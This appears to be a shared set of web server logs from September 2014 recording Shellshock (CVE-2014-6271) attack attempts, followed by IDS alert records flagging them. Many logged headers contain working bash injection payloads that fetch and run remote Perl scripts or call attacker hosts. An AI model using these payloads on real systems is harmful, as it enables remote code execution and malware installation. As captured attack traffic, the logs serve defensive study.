Last active
August 29, 2015 14:07
shellshock_logs
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:09 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:11 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" |
209.126.230.72 - - [25/Sep/2014:02:03:16 +0000] "GET / HTTP/1.0" 793 0 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" | |
166.78.61.142 - - [25/Sep/2014:11:33:48 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444" | |
93.103.21.231 - - [26/Sep/2014:00:37:45 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://oneiroi.co.uk/'" | |
91.200.84.22 - - [26/Sep/2014:08:36:58 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=oneiroi.co.uk -O /tmp/a.pl\x22" | |
146.71.113.194 - - [26/Sep/2014:09:12:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22" | |
94.102.60.177 - - [26/Sep/2014:14:09:31 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 301 178 "-" "() { x;};echo;echo 123456ololo | md5sum" | |
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET / HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
83.166.234.133 - - [27/Sep/2014:03:13:23 +0000] "GET / HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://oneiroi.co.uk/\x22" |
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
